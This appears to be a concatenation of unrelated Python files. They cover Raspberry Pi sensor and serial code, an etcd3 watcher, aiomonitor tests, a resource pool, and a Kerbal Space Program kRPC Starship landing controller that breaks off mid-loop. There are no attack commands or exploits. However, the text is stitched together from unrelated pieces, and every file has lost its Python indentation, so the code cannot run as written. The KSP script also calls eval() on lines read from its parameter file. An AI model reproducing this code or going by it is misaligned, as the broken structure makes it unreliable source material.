se1("Distance measurement in progress")
GPIO.setup(TRIG,GPIO.OUT)
GPIO.setup(ECHO,GPIO.IN)
GPIO.output(TRIG,False)
time.sleep(0.2)
GPIO.output(TRIG,True)
time.sleep(0.00001)
GPIO.output(TRIG,False)
while GPIO.input(ECHO)==0:
pulse_start=time.time()
while GPIO.input(ECHO)==1:
pulse_end=time.time()
pulse_duration=pulse_end-pulse_start
distance=pulse_duration*17150
distance=round(distance,2)
se1(distance)
time.sleep(2)
if(distance <115):
compute()
else:
schedule.run_pending()
se1("\nPlease move towards the sensor") |
data_collection_class.py | import serial
import RPi.GPIO as gpio
import time
import pandas as pd
import threading
import numpy as np
class data_collection:
def __init__(self, coms_chan, ouput_csv, cols):
self.ouput_csv = ouput_csv # name of output csv file
self.ser = serial.Serial(coms_chan, 9600, timeout=30) # establish comms connection
self.lock = threading.Lock() # Create thread locking object
self.cols = cols
self.df = pd.DataFrame(columns=cols) # creates empty dataframe
print('starting comms thread')
self.running = True # used to enable or disable the thread (when True, loops to infinity)
self.listen_thread = threading.Thread(target=self.waiting_for_data)
self.listen_thread.start() # starts thread
def pack_data(self):
self.lock.acquire() # prevents thread from terminating during data aquisition
# Creates a list were the number of elements is equal to the number of columns of the df
try:
data = [(float(self.ser.readline().decode('utf-8').rstrip())) for _ in range(len(self.cols))]
except:
data = [None for _ in range(len(self.cols))]
# print(data)
df_temp = pd.DataFrame(np.array(data).reshape(1,-1),
columns=self.cols) # concats new data to dataframe
self.df = pd.concat([self.df, df_temp]).reset_index(drop=True)
self.lock.release()
# method used by thread
def waiting_for_data(self):
self.ser.reset_input_buffer() # resets input buffer before starting thread
while self.running: # runs while self.running = True
if (self.ser.in_waiting > 0): # if serial input buffer has data, trigger pack_data() method
self.pack_data()
# method is called by user when comms are to be terminated and collected
# data converted to csv
def stop_listening(self):
self.lock.acquire() # prevents new data from coming in while converting data to csv
self.df.to_csv(self.ouput_csv, index=False) # converts dataframe to csv
print('data converted to csv')
self.running = False # terminated comms thread
print('Comms thread terminated')
self.lock.release()
|
_watcher.py | from __future__ import absolute_import
import logging
from threading import Thread
from time import sleep
import grpc
from etcd3 import _utils
from etcd3._grpc_bd_stream import GrpcBDStream
from etcd3._grpc_stubs.rpc_pb2 import WatchCreateRequest, WatchRequest
_DEFAULT_SPIN_PAUSE = 3 # seconds
_log = logging.getLogger(__name__)
class Watcher(object):
def __init__(self, client, key, event_handler, is_prefix=False,
start_revision=0, spin_pause=None):
self._client = client
self._key = key
self._is_prefix = is_prefix
self._start_revision = start_revision
self._event_handler = event_handler
self._spin_pause = spin_pause or _DEFAULT_SPIN_PAUSE
watch_create_rq = WatchCreateRequest(
key=_utils.to_bytes(key),
start_revision=start_revision)
if is_prefix:
watch_create_rq.range_end = _utils.range_end(watch_create_rq.key)
self._watch_rq = WatchRequest(create_request=watch_create_rq)
self._name = 'watcher_' + key
self._stop = False
self._thread = Thread(name=self._name, target=self._run)
self._thread.daemon = True
def start(self):
self._thread.start()
def stop(self, timeout=None):
self._stop = True
self._thread.join(timeout)
return not self._thread.is_alive()
def _run(self):
_log.info('%s started', self._name)
start_revision = None
while not self._stop:
try:
# Test if the key can be accessed. That is needed to trigger
# reconnects and also checks if there is enough permissions.
self._client.get(self._key, self._is_prefix)
watch_stub = self._client._get_watch_stub()
grpc_stream = GrpcBDStream(self._name + '_stream',
watch_stub.Watch)
if start_revision:
self._watch_rq.create_request.start_revision = start_revision
grpc_stream.send(self._watch_rq, self._client._timeout)
except Exception:
_log.exception('Failed to initialize watch: %s', self._key)
sleep(self._spin_pause)
continue
try:
while not self._stop:
rs = grpc_stream.recv(self._spin_pause)
if not rs:
continue
if rs.created:
_log.info('Watch created: %s', self._key)
for e in rs.events:
start_revision = e.kv.mod_revision + 1
try:
self._event_handler(e)
except Exception:
_log.exception('Event handler failed: %s', e)
except grpc.RpcError as err:
severity = logging.ERROR
# Cancelled error is raised when the underlying gRPC channel
# is reset by the client itself, when retrying a gRPC error. On
# the off-chance the error can be returned on another yet
# unknown reason, it is reported as warning rather then info.
if err.code() == grpc.StatusCode.CANCELLED:
severity = logging.WARN
_log.log(severity, 'Watch stream failed: %s', self._key)
sleep(self._spin_pause)
except Exception:
_log.exception('Watch stream failed: %s', self._key)
sleep(self._spin_pause)
finally:
grpc_stream.close(self._client._timeout)
_log.info('%s stopped', self._name)
|
main.py | from __future__ import print_function
# python imports
from multiprocessing import Process, Value, Array, Queue
from collections import deque
from time import sleep
# RPi imports
import serial
# my imports
from capture_layer import CaptureLayer
from input_layer import InputLayer
from control_layer import ControlLayer
motor_busy = Value('b')
motor_busy.value = True
control_vector = Array('f', [0,0,0])
def serial_control():
global motor_busy, control_vector
port = serial.Serial(port='/dev/ttyS0', baudrate = 115200, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS,timeout=.01)
while 1:
s_in = port.readline()
if len(s_in) > 0:
motor_busy.value = 1 if (s_in[:4] == "busy") else 0
#print(motor_busy.value, s_in)
port.write("X%d \n" % control_vector[0])
if control_vector[1] != 0:
data = "C%d \n" % control_vector[1]
port.write(data)
print("sent data:", data)
port.write("S%f \n" % control_vector[2])
########################################################
def main():
capture_layer = CaptureLayer()
input_layer = InputLayer()
control_layer = ControlLayer()
main_loop = True
capture_thread = Process(target=capture_layer.run_capture)
serial_thread = Process(target=serial_control)
capture_thread.start()
serial_thread.start()
last_busy = 1
while main_loop:
shape = capture_layer.marker_shape[:]
input_layer.update(shape, motor_busy.value)
control_layer.update(input_layer)
control_vector[0:3] = control_layer.get_control_vector()
if last_busy != motor_busy.value:
last_busy = motor_busy.value
print("BUSY" if motor_busy.value else "FREE")
if control_vector[1] != 0:
print("%d cm, %.1f deg" % (input_layer.distance_cm, input_layer.angle_deg)," "*8)
print("desired %d cm = %d steps" % (control_layer.desired_cm, control_vector[1]),
"conf: %.2f" % input_layer.distance_filter.confidence())
sleep(0.020)
########################################################
if __name__ == '__main__':
main() |
test_monitor.py | import asyncio
import pytest
import telnetlib
import threading
import time
from aiomonitor import Monitor, start_monitor
from aiomonitor.monitor import MONITOR_HOST, MONITOR_PORT
@pytest.yield_fixture
def monitor(loop):
def make_baz():
return 'baz'
locals_ = {'foo': 'bar', 'make_baz': make_baz}
mon = Monitor(loop, locals=locals_)
ev = threading.Event()
def f(mon, loop, ev):
asyncio.set_event_loop(loop)
with mon:
ev.set()
loop.run_forever()
thread = threading.Thread(target=f, args=(mon, loop, ev))
thread.start()
ev.wait()
yield mon
loop.call_soon_threadsafe(loop.stop)
thread.join()
@pytest.yield_fixture
def tn_client(monitor):
tn = telnetlib.Telnet()
for _ in range(10):
try:
tn.open(MONITOR_HOST, MONITOR_PORT, timeout=5)
break
except OSError as e:
print('Retrying after error: {}'.format(str(e)))
time.sleep(1)
else:
pytest.fail('Can not connect to the telnet server')
tn.read_until(b'monitor >>>', 10)
yield tn
tn.close()
def test_ctor(loop, unused_port):
with Monitor(loop, console_enabled=False):
loop.run_until_complete(asyncio.sleep(0.01, loop=loop))
with start_monitor(loop, console_enabled=False) as m:
loop.run_until_complete(asyncio.sleep(0.01, loop=loop))
assert m.closed
m = Monitor(loop, console_enabled=False)
m.start()
try:
loop.run_until_complete(asyncio.sleep(0.01, loop=loop))
finally:
m.close()
m.close() # make sure call is idempotent
assert m.closed
m = Monitor(loop, console_enabled=False)
m.start()
with m:
loop.run_until_complete(asyncio.sleep(0.01, loop=loop))
assert m.closed
def execute(tn, command, pattern=b'>>>'):
tn.write(command.encode('utf-8'))
data = tn.read_until(pattern, 100)
return data.decode('utf-8')
def get_task_ids(loop):
return [id(t) for t in asyncio.Task.all_tasks(loop=loop)]
def test_basic_monitor(monitor, tn_client, loop):
tn = tn_client
resp = execute(tn, 'help\n')
assert 'Commands' in resp
resp = execute(tn, 'xxx\n')
assert 'Unknown command' in resp
resp = execute(tn, 'ps\n')
assert 'Task' in resp
resp = execute(tn, 'ps 123\n')
assert 'Task' in resp
resp = execute(tn, 'signal name\n')
assert 'Unknown signal name' in resp
resp = execute(tn, 'wehere 123\n')
assert 'No task 123' in resp
resp = execute(tn, 'cancel 123\n')
assert 'No task 123' in resp
def test_cancel_where_tasks(monitor, tn_client, loop):
tn = tn_client
async def sleeper(loop):
await asyncio.sleep(100, loop=loop) # xxx
fut = asyncio.run_coroutine_threadsafe(sleeper(loop), loop=loop)
# TODO: we should not rely on timeout
time.sleep(0.1)
task_ids = get_task_ids(loop)
assert len(task_ids) > 0
for t_id in task_ids:
resp = execute(tn, 'where {}\n'.format(t_id))
assert 'Task' in resp
resp = execute(tn, 'cancel {}\n'.format(t_id))
assert 'Cancel task' in resp
fut.cancel()
def test_monitor_with_console(monitor, tn_client):
tn = tn_client
resp = execute(tn, 'console\n')
assert 'This console is running in an asyncio event loop' in resp
execute(tn, 'await asyncio.sleep(0, loop=loop)\n')
resp = execute(tn, 'foo\n')
assert ' bar\n>>>' == resp
resp = execute(tn, 'make_baz()\n')
assert ' baz\n>>>' == resp
execute(tn, 'exit()\n')
resp = execute(tn, 'help\n')
assert 'Commands' in resp
|
pool.py | from __future__ import absolute_import, unicode_literals, print_function, division
import time
from queue import Queue, Empty
from threading import Lock
class _ResourcePoolSession(object):
def __init__(self, pool, obj, close_on_exc=False):
self.__pool = pool
self.__obj = obj
self.__close_on_exc = close_on_exc
self.__closed = False
def __repr__(self):
return "ResourcePoolSession(obj={0})".format(self.__obj)
def __getattr__(self, name):
if self.__closed:
raise RuntimeError("The session has been closed.")
return getattr(self.__obj, name)
def __del__(self):
self.release_to_pool()
def __enter__(self):
return self
def __exit__(self, ex_type, ex_value, traceback):
self.release_to_pool(ex_type is not None)
def release_to_pool(self, close=False):
"""Release the obj into the resource pool.
If close is True, close it at first, then create a new obj and put it
into the resource pool.
"""
if self.__closed:
return
self.__closed = True
if close:
try:
self.__obj.close()
except Exception:
pass
self.__obj = None
self.__pool._put_from_session(self.__obj)
def close(self):
self.release_to_pool(close=True)
class ResourcePool(object):
def __init__(self, cls, *args, capacity=0, idle_timeout=None, autowrap=False,
close_on_exc=False, **kwargs):
"""Create a new pool object.
@param cls(object): The object class to be manage.
@param args(tuple): The positional parameters of cls.
@param kwargs(dict): The key parameters of cls.
@param capacity(int): The maximum capacity of the pool.
If 0, the capacity is infinite.
@param idle_timeout(int): The idle timeout. The unit is second.
If None or 0, never time out.
@param autowrap(bool): If True, it will wrap the obj in ResourcePoolSession
automatically, which will release the obj into the
pool when the session is closed or deleted.
@param close_on_exc(bool): If True and autowrap is True, in with context,
the session will close the obj firstly,
then new an new one into the pool.
"""
capacity = capacity if capacity >= 0 else 0
self._cls = cls
self._args = args
self._kwargs = kwargs
self._closed = False
self._lock = Lock()
self._capacity = capacity
self._timeout = idle_timeout
self._pools = Queue(capacity)
self._autowrap = autowrap
self._close_on_exc = close_on_exc
while capacity > 0:
self.put(None)
capacity -= 1
def __del__(self):
self.close()
def _get_now(self):
return int(time.time())
def _close_obj(self, obj):
if obj:
try:
obj.close()
except Exception:
pass
def close(self):
"""Close the pool and release all the objects.
When closed, it will raise an RuntimeError if putting an object into it.
"""
with self._lock:
if self._closed:
return
self._closed = True
while True:
try:
self._close_obj(self._pools.get_nowait()[0])
self._pools.task_done()
except Empty:
return
def get(self, timeout=None):
"""Get an object from the pool.
When the pool is closed, it will raise a RuntimeError if calling this
method.
"""
with self._lock:
if self._closed:
raise RuntimeError("The pool has been closed.")
_get = lambda obj: _ResourcePoolSession(self, obj, self._close_on_exc) \
if obj and self._autowrap else obj
if not self._capacity:
try:
obj = self._pools.get_nowait()
self._pools.task_done()
except Empty:
obj = (self._cls(*self._args, **self._kwargs), self._get_now())
else:
obj = self._pools.get(timeout=timeout)
self._pools.task_done()
if obj and obj[0]:
if self._timeout and self._get_now() - obj[1] > self._timeout:
return _get(self.get(timeout=timeout))
return _get(obj[0])
return _get(self._cls(*self._args, **self._kwargs))
def put(self, obj):
"""Put an object into the pool.
When the pool is closed, it will close the object, not put it into the
pool, if calling this method.
"""
with self._lock:
if self._closed:
self._close_obj(obj)
return
if isinstance(obj, _ResourcePoolSession):
obj.release_to_pool()
else:
self._pools.put_nowait((obj, self._get_now()))
def put_with_close(self, obj):
self._close_obj(obj)
self.put(None)
def _put_from_session(self, obj):
self._pools.put_nowait((obj, self._get_now()))
def main(pool):
o1 = pool.get()
print(o1)
o2 = pool.get()
print(o2)
def f():
o3 = pool.get()
print(o3)
pool.put(o3)
t = Thread(target=f)
t.start()
time.sleep(3)
pool.put(o1)
pool.put(o2)
return t
if __name__ == "__main__":
import time
from threading import Thread
class Obj(object):
def __init__(self):
self.time = time.time()
time.sleep(0.1)
def close(self):
print("close {0}".format(self.time))
def __repr__(self):
return "Obj(time={0})".format(self.time)
pool = ResourcePool(Obj, capacity=2, idle_timeout=1, autowrap=True)
task = main(pool)
time.sleep(1)
task.join()
|
KSP_controller_starship.py |
import krpc
import time
import math
import numpy as np
import numpy.linalg as npl
import SC_solver as solver
import SC_params
from KSP_controller_utils import *
from threading import Thread
print('--------')
# 读取KSP_controller_params.txt中的参数
params = {}
with open('KSP_controller_starship_params.txt', 'r', encoding='utf-8') as f:
for line in f:
pair = line.split('#')[0].split('=')
if len(pair) == 2:
key = pair[0].strip()
value = eval(pair[1])
params[key] = value
#打印参数
print('----------params------------')
for k in (params):
print(' %s: \n%s' % (k, params[k]))
print('\n\ninitializing...')
#常量
deg2rad = math.pi / 180
rad2deg = 180 / math.pi
g0 = params['g0']
#连接krpc
print('connecting...')
conn = krpc.connect(name='SC_controller')
space_center = conn.space_center
vessel = space_center.active_vessel
flight = vessel.flight()
body = vessel.orbit.body
# 'TE2.19.BFS.SL.RAPTOR'
# 'TE2.19.SS.RF.R'
# 'TE2.19.SS.RF.L'
# 'TE2.19.SS.FF.R'
# 'TE2.19.SS.FF.L'
# 'SyncModuleControlSurface' module
# -90=完全抬起 +90=完全向下
#f_rr = [m for m in vessel.parts.with_name('TE2.19.SS.RF.R')[0].modules if m.name == 'SyncModuleControlSurface'][0]
#f_rr.set_field_float('Deploy Angle', 90)
#f_rr.set_field_string('Deploy', 'false')
#asdf
# starship main engines
engine_gimbal = [m for m in vessel.parts.with_name('TE2.19.BFS.SL.RAPTOR')[0].modules if m.name == 'ModuleGimbal']
# 'TE2.19.BFS.SL.RAPTOR'
engine_y = vessel.parts.with_name('TE2.19.BFS.SL.RAPTOR')[0].position(vessel.reference_frame)[1]
# starship flap
get_hinge = lambda tagname:[m for m in vessel.parts.with_tag(tagname)[0].modules if m.name=='ModuleRoboticServoHinge'][0]
h_fl = get_hinge('h_fl')
h_fr = get_hinge('h_fr')
h_rl = get_hinge('h_rl')
h_rr = get_hinge('h_rr')
#set 'Target Angle' 0~180
def set_deploy(h, deploy, center=90):
aoa = math.asin(clamp(deploy, 0, 1)) * rad2deg
h.set_field_float('Target Angle', clamp(90 + center - aoa, 0, 180))
#set_deploy = lambda h, deploy: h.set_field_float('Target Angle', 180 - math.asin(clamp(deploy, 0, 1)) * rad2deg)
#set_deploy_rev = lambda h, deploy: h.set_field_float('Target Angle', math.asin(clamp(deploy, 0, 1)) * rad2deg)
set_retract = lambda h:h.set_field_float('Target Angle', 180)
set_deploy(h_fl, 1)
set_deploy(h_fr, 1)
set_deploy(h_rl, 1)
set_deploy(h_rr, 1)
#asdf
#fin_weight_ratio = 0.8 / 1.0
#def combine_flaps(pitch_up, roll_right, roll_attack=0):
# roll_attack = clamp(roll_attack, -60, 60)
# pitch_up = clamp(pitch_up, -1, 1)
# roll_right = clamp(roll_right, -1, 1)
# ctrl_fl = (pitch_up + roll_right) / fin_weight_ratio #前后翼面不一样大 系数修正
# ctrl_fr = (pitch_up - roll_right) / fin_weight_ratio
# ctrl_rl = -pitch_up + roll_right
# ctrl_rr = -pitch_up - roll_right
# gap = max(0, 0.95 - max(ctrl_fl, ctrl_fr, ctrl_rl, ctrl_rr))
# ctrl_fl += gap
# ctrl_fr += gap
# ctrl_rl += gap
# ctrl_rr += gap
# set_deploy(h_fl, (ctrl_fl) / 2. + 0.5, 90 - roll_attack)
# set_deploy(h_fr, (ctrl_fr) / 2. + 0.5, 90 + roll_attack)
# set_deploy(h_rl, (ctrl_rl) / 2. + 0.5, 90 - roll_attack)
# set_deploy(h_rr, (ctrl_rr) / 2. + 0.5, 90 + roll_attack)
def combine_flaps(pitch_up, spin_right):
pitch_up = clamp(pitch_up, -1, 1)
#roll_right = clamp(roll_right, -1, 1)
spin_right = clamp(spin_right, -1, 1)
ctrl_fl = pitch_up
ctrl_fr = pitch_up
ctrl_rl = -pitch_up
ctrl_rr = -pitch_up
gap = max(0, 0.95 - max(ctrl_fl, ctrl_fr, ctrl_rl, ctrl_rr))
ctrl_fl += gap
ctrl_fr += gap
ctrl_rl += gap
ctrl_rr += gap
ctrl_fl += -spin_right * 0.4
ctrl_fr += spin_right * 0.4
ctrl_rl += spin_right * 0.28
ctrl_rr += -spin_right * 0.28
set_deploy(h_fl, (ctrl_fl) / 2. + 0.5)
set_deploy(h_fr, (ctrl_fr) / 2. + 0.5)
set_deploy(h_rl, (ctrl_rl) / 2. + 0.5)
set_deploy(h_rr, (ctrl_rr) / 2. + 0.5)
def retract_flaps():
(h_fl).set_field_float('Target Angle', 180)
(h_fr).set_field_float('Target Angle', 180)
(h_rl).set_field_float('Target Angle', 180)
(h_rr).set_field_float('Target Angle', 180)
#gimbal
#hinge_x = [m for m in vessel.parts.with_tag('hx')[0].modules if m.name=='ModuleRoboticServoHinge'][0]
#hinge_z = [m for m in vessel.parts.with_tag('hz')[0].modules if m.name=='ModuleRoboticServoHinge'][0]
#hinge_offset_y = hinge_x.part.position(vessel.reference_frame)[1]
#gimbalX = lambda angle:hinge_x.set_field_float('Target Angle', angle)
#gimbalY = lambda angle:hinge_z.set_field_float('Target Angle', angle)
#print(hinge_x.fields)
#www
delta_time = 0.01
#target 经纬度转地固系
target_lat = params['target_lat'] * deg2rad
target_lon = params['target_lon'] * deg2rad
target_height = params['target_height']
target_axis = target_height + body.surface_height(target_lat * rad2deg, target_lon * rad2deg) + body.equatorial_radius
target_body_pos = np.array((math.cos(target_lon) * math.cos(target_lat), math.sin(target_lat), math.sin(target_lon) * math.cos(target_lat))) * target_axis
#limit
throttle_limit = params['throttle_limit']
throttle_limit_ctrl = params['throttle_limit_ctrl']
max_tilt = np.deg2rad(params['max_tilt'])
max_tilt_off = np.deg2rad(params['max_tilt_off'])
# krpc vessel对象生成vesselprofile
def get_vessel_profile(vessel):
p = SC_params.VesselProfile()
p.isp = vessel.specific_impulse
p.g = vec(-g0, 0., 0.) # gravity
p.m_dry = vessel.dry_mass
p.gamma_gs = np.deg2rad(params['gamma_gs']) # glide slope
p.theta_max = np.linspace(np.deg2rad(params['max_tilt']), np.deg2rad(10), SC_params.SuperParams().K) # tilt
p.omega_max = np.deg2rad(params['max_omega']) # rotation vel
p.delta_max = np.deg2rad(params['max_delta']) # gimbal
p.T_min = vessel.available_thrust * throttle_limit[0]
p.T_max = vessel.available_thrust * throttle_limit[1]
p.r_T_B = vec(engine_y, 0., 0.) # thrust offset
p.J_B_I = np.array(vessel.inertia_tensor).reshape((3, 3))
p.airfric_k = params['airfric_k']
p.time_guess = params['tf_guess']
return p
# 根据krpc vessel对象预测落到给定高度时的vesselstate
def predict_vessel_state(vessel, est_height):
# ref_target flight
vel = vec(vessel.velocity(ref_target))
pos = vec(vessel.position(ref_target))
est_t = (pos[0] - est_height) / (-vel[0]) #匀速
est_pos = pos + est_t * vel
hdg_right = (flight.heading + 90) * deg2rad #右侧指向
rot_axis = v3(0, math.cos(hdg_right), math.sin(hdg_right))
rot_quat = quat(rot_axis, 90 * deg2rad)
#qx, qy, qz, qw = vessel.rotation(ref_target) #xyzw转wxyz
qx, qy, qz, qw = rot_quat #xyzw转wxyz
state = SC_params.VesselState()
state.mass = vessel.mass
state.pos = est_pos
state.vel = vel
state.rotation = vec(qw, qx, qy, qz)
#state.rotation = vec(1, 0, 0, 0)
state.omega = vec(0, 0, 0)
return state
# 最后一段预留final_height垂直下落,反推末端状态
def get_final_state(vessel, final_height):
optimal_acc = vessel.available_thrust / vessel.mass * params['final_throttle'] - g0
final_vel = math.sqrt(2 * optimal_acc * final_height)
state = SC_params.VesselState()
state.mass = vessel.mass
state.pos = vec(final_height, 0, 0)
state.vel = vec(-final_vel, 0, 0)
state.rotation = vec(1, 0, 0, 0)
state.omega = vec(0, 0, 0)
return state
# -------各种PID控制器初始化----------
#fall attitude
ctrl_fall_pitch = PID()
ctrl_fall_pitch.kp = params['ctrl_fall_pitch.kp']
ctrl_fall_pitch.kd = params['ctrl_fall_pitch.kd']
#ctrl_fall_pitch.ki = params['ctrl_fall_pitch.ki'] # set that later
ctrl_fall_pitch.integral_limit = params['ctrl_fall_pitch.integral_limit']
ctrl_fall_yaw = PID()
ctrl_fall_yaw.kp = 0 # params['ctrl_fall_yaw.kp']
ctrl_fall_yaw.kd = params['ctrl_fall_yaw.kd']
ctrl_fall_roll = PID()
ctrl_fall_roll.kp = params['ctrl_fall_roll.kp']
ctrl_fall_roll.kd = params['ctrl_fall_roll.kd']
ctrl_fall_distance = PID()
ctrl_fall_distance.kp = params['ctrl_fall_distance.kp']
ctrl_fall_distance.kd = params['ctrl_fall_distance.kd']
#rotation
ctrl_x_rot = PID()
ctrl_x_rot.kp = params['ctrl_x_rot.kp']
ctrl_x_rot.kd = params['ctrl_x_rot.kd']
#ctrl_x_rot.redundancy = 0.1
ctrl_y_avel_kp = params['ctrl_y_avel_kp']
ctrl_z_rot = PID()
ctrl_z_rot.kp = params['ctrl_z_rot.kp']
ctrl_z_rot.kd = params['ctrl_z_rot.kd']
#ctrl_z_rot.redundancy = 0.1
#测量值
#torque = v3(3.66e+04, 5000, 3.66e+04)
#torque_k = v3(8.2e+04-3.66e+04, 0, 8.2e+04-3.66e+04)
#torque = v3(10300.000011920929, 10300.000011920929, 10300.000011920929)
#torque_k = v3(15183.20083618, 10772.2761631, 15183.24184418)
#print(vessel.available_torque)
# k
k_x = params['k_x']
k_v = params['k_v']
# final
final_throttle = params['final_throttle']
final_kp = params['final_kp']
# time init
game_delta_time = 0.02
game_prev_time = space_center.ut
start_time = time.time()
# references
print('creating target frame...')
ref_local = vessel.reference_frame
ref_surface = vessel.surface_reference_frame #地面参考系 原点为载具质心
ref_body = body.reference_frame #地固系
ref_target_temp = space_center.ReferenceFrame.create_relative(ref_body, position=target_body_pos) #地固系原点平移到目标位置
ref_target = space_center.ReferenceFrame.create_hybrid(ref_target_temp, rotation=ref_surface, velocity=ref_target_temp) #混合坐标系 原点在目标处,旋转同地面系(Up-North-East)
prev_vel = vec(vessel.velocity(ref_surface))
K = SC_params.SuperParams().K
solved_path = None
n_i = -1
error = vec(vessel.position(ref_target))
#print('current error: %s' % error)
debug_lines = params['debug_lines']
if debug_lines:
print('debug lines...')
lines = [conn.drawing.add_line((0,0,0),(0,0,0), ref_target) for i in range(K-1)] #轨迹线
directions = [conn.drawing.add_line((0,0,0), (1,0,0), ref_target) for i in range(K)] #机头指向
thrustvecs = [conn.drawing.add_line((0,0,0), (1,0,0), ref_target) for i in range(K)] #推力指向
target_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target) #轨迹采样标记
target_line.color = (0,0,1)
target2_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target) #提前采样
target2_line.color = (0,0,1)
head_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target) #目标姿态指向
head_line.color = (0,1,1)
for line in directions:
line.color = (1,0,0)
for line in thrustvecs:
line.color = (1,0,1)
nav_mode = 'none'
frcount = 0
def update_lines(x, u):
print('debug lines...')
m_u = vessel.available_thrust
for i in range(K-1):
lines[i].start = x[1:4, i]
lines[i].end = x[1:4, i+1]
for i in range(K):
mat = rotation_mat(x[7:11, i])
directions[i].start = x[1:4, i]
directions[i].end = x[1:4, i] + transform(vec(1, 0, 0), mat) * 5
thrustvecs[i].start = x[1:4, i]
thrustvecs[i].end = x[1:4, i] - transform(u[:, i], mat) / m_u * 10
#找到轨迹最近点
def find_nearest_index(rk, vk, error):
nearest_mag = npl.norm(rk[:, 0] - error)
nearest_i = 0
for i in range(x.shape[1]):
mag = npl.norm(rk[:, i] - error) # + npl.norm(x[3:6, i] - v) * 0.2
if mag < nearest_mag:
nearest_mag = mag
nearest_i = i
v = vk[:, nearest_i]
v_norm = npl.norm(v)
v_dir = v / v_norm
frac = clamp(np.dot(error - rk[:, nearest_i], v_dir) / (tf / K * v_norm), 0.5, -0.5)
return nearest_i + frac
#轨迹采样
def sample_index(index, rk, vk, qk, uk):
#if index >= N-1:
if index >= K-1:
return (rk[:, K-1], vk[:, K-1], qk[:, K-1], uk[:, K-1])
#return (v3(0,0,0), v3(0,0,0), v3( 9.807,0,0))
elif index <= 0:
i = 0
frac = index
else:
i = math.floor(index)
frac = index - i
r_i_s = lerp(rk[:, i], rk[:, i+1], frac)
v_i_s = lerp(vk[:, i], vk[:, i+1], frac)
q_i_s = lerp(qk[:, i], qk[:, i+1], frac)
u_i_s = lerp(uk[:, i], uk[:, i+1], frac)
if index < 0:
u_i_s = uk[:, 1].copy()
#print('u1234 ' + str(u[:, 0:4]))
#print('u_i_s ' + str(u[:, 1]))
return (r_i_s.copy(), v_i_s.copy(), q_i_s.copy(), u_i_s.copy())
#限制在圆台区域内
def conic_clamp(target_a, min_mag, max_mag, max_tilt):
a_mag = npl.norm(target_a)
hor_dir = v3(0, target_a[1], target_a[2])
hor_dir /= npl.norm(hor_dir)
#target_direction = target_a / a_mag
a_hor = npl.norm(target_a[1:3])
a_ver = target_a[0]
if (a_hor < min_mag * math.sin(max_tilt)):
a_ver_min = math.sqrt(min_mag**2 - a_hor**2)
else:
a_ver_min = math.cos(max_tilt) * min_mag
if (a_hor < max_mag * math.sin(max_tilt)):
a_ver_max = math.sqrt(max_mag**2 - a_hor**2)
else:
a_ver_max = math.cos(max_tilt) * max_mag
a_ver = clamp(a_ver, a_ver_max, a_ver_min)
a_hor = min(a_hor, a_ver * math.tan(max_tilt))
return hor_dir * a_hor + v3(a_ver, 0, 0)
#求解路径 放入全局变量solved_path
def solve_path(vessel_profile, vessel_state, vessel_final_state):
global solved_path, n_i
print('----------vessel_profile(original)------------')
for k in (vessel_profile.__dict__):
print('-- %s: \n%s' % (k, vessel_profile.__dict__[k]))
print('----------vessel_state(original)------------')
for k in (vessel_state.__dict__):
print('-- %s: \n%s' % (k, vessel_state.__dict__[k]))
print('----------vessel_final_state(original)------------')
for k in (vessel_final_state.__dict__):
print('-- %s: \n%s' % (k, vessel_final_state.__dict__[k]))
solver_options = SC_params.SolverOptions()
solver_options.w_delta = lambda i:(1e-3 * (2 ** i))
#solver_options.w_nu = 1e5
print('---------solving----------')
solved_path = solver.solve(vessel_profile, vessel_state, vessel_final_state,
solver_options=solver_options, use_c=True, verbose=True)
if solved_path != None:
(x, u, tf) = solved_path
qw, qx, qy, qz = x[7:11, :]
x[7:11, :] = vec(qx, qy, qz, qw) # wxyz转xyzw
n_i = -100
solved_path = (x, u, tf)
# print('x slice')
# print(x[:, 0:3])
# print('u slice')
# print(u[:, 0:3])
print('---------solve done----------')
if debug_lines:
update_lines(x, u)
else:
print('---------solve error----------')
print('---------loop start-------------')
set_deploy(h_fl, 1)
set_deploy(h_fr, 1)
set_deploy(h_rl, 1)
set_deploy(h_rr, 1) #fin放到自然状态
while True:
time.sleep(delta_time)
real_time = time.time() - start_time
ut = space_center.ut
game_delta_time = ut - game_prev_time
if game_delta_time < 0.01: #意味着游戏中还没有经过一个物理帧,所以不进行计算
continue
# 取得一些之后要用的数据
vessel_d = {}
error = vessel_d['error'] = vec(vessel.position(ref_target)) # 目标系里的偏差
avel = vessel_d['avel'] = vec(vessel.angular_velocity(ref_surface)) # 地面系下角速度(等于目标系角速度
vel = vessel_d['vel'] = vec(vessel.velocity(ref_target)) # 地面速度
rotation_local2srf = rotation_mat(vec(vessel.rotation(ref_surface))) # 机体系到地面系旋转矩阵
rotation_srf2local = npl.inv(rotation_local2srf) # 地面系到机体系旋转矩阵
moment_of_inertia_local = vec(vessel.moment_of_inertia) # 转动惯量
mass = vessel_d['mass'] = vessel.mass
max_thrust = vessel_d['max_thrust'] = vessel.available_thrust
acceleration = vessel_d['acceleration'] = (vel - prev_vel) / game_delta_time
#print(game_delta_time)
if nav_mode == 'launch': #跳到一定高度
balanced_thr = mass * g0 / max_thrust
target_direction = v3(1, 0.02, 0) #偏一点
#print(target_direction)
vessel.control.throttle = balanced_thr + (params['hop_vel'] - npl.norm(vel)) * 0.05 #比例反馈控制
#print(error[0])
if (error[0] > params['hop_altitude']):
nav_mode = 'transit'
print('transit')
elif nav_mode == 'transit': #减弱推力直到垂直速度为负
balanced_thr = mass * g0 / max_thrust
target_direction = v3(1, 0, 0)
vessel.control.throttle = balanced_thr * 0.25 #保持0.25TWR
if (vel[0] < -10):
vessel.control.rcs = False
vessel.control.pitch = -1 # pitch down
time.sleep(1) #保持一秒
vessel.control.pitch = 0
vessel.control.throttle = 0
vessel.control.rcs = True
nav_mode = 'fall'
print('fall')
elif nav_mode == 'fall': # 下落阶段 翼面控制姿态
pitch_target = clamp(ctrl_fall_distance.update((math.sqrt(error[2]**2 + error[1]**2) - params['ctrl_fall_distance_target']) / 200., game_delta_time), -1, 1) * 15 #PID
pitch_error = (flight.pitch - pitch_target) * deg2rad
hdg_target = math.atan2(-error[2], -error[1]) * rad2deg
hdg_error = norm_deg(flight.heading - hdg_target) * deg2rad
roll_error = flight.roll * deg2rad
#print(ctrl_fall_pitch.integral, math.sqrt(error[2]**2 + error[1]**2))
if (abs(pitch_error) < 0.3):
